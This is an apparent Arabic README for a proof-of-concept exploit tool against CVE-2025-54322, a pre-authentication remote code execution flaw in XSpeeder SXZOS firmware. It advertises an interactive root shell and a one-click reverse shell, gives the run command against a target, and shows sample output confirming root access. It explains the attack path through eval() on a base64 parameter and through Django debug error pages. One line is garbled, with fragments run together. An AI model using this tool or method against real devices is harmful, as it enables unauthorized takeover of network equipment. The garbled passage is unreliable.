
استغلال إثبات المفهوم لثغرة CVE-2025-54322، وهي ثغرة حرجة تتمثل في تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة في البرنامج الثابت XSpeeder SXZOS. توفر صدفة تفاعلية، وحمولات صدفة عكسية، وتهيئة جلسة تلقائية لاختبارات الأمان المصرح بها.
أداة إثبات مفهوم (PoC) احترافية لاستغلال CVE-2025-54322، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة في البرنامج الثابت XSpeeder SXZOS. تم اكتشاف هذه الثغرة والإفصاح عنها بواسطة وكيل الذكاء الاصطناعي المستقل من pwn.ai.
eval() على مدخلات يقدّمها المستخدمcd)./webInfos/.requestspip install requests
شغّل الأداة ضد عنوان URL مستهدف:
python3 cve-2025-54322-exploit.py https://<target-ip>:<port>
[*] Connecting to: https://1.2.3.4:4433
[*] Initializing environment...
[+] Target confirmed: root@sxzros
==================================================
CVE-2025-54322 Exploit Tool
==================================================
1. Enter Interactive CMD Shell
2. One-Click Reverse Shell
3. Exit
==================================================



تنبع الثغرة من الاستخدام غير الآمن لدالة eval() في بايثون داخل مكوّن vLogin.py. يقوم الخادم بفك ترميز المعامل chkid المشفّر بنظام base64 ويمرّره مباشرةً إلى eval().
تستغل أدوتنا حقيقة أن العديد من هذه الأجهزة لديها وضع DEBUG الخاص بـ Django مفعّلًا، مما يسمح لنا بالتقاط مخرجات الأوامر من المتغيرات المحلية المعروضة في صفحة الخطأ الناتجة.
هذه الأداة مخصّصة لأغراض الاختبارات الأمنية التعليمية والمرخّصة فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني.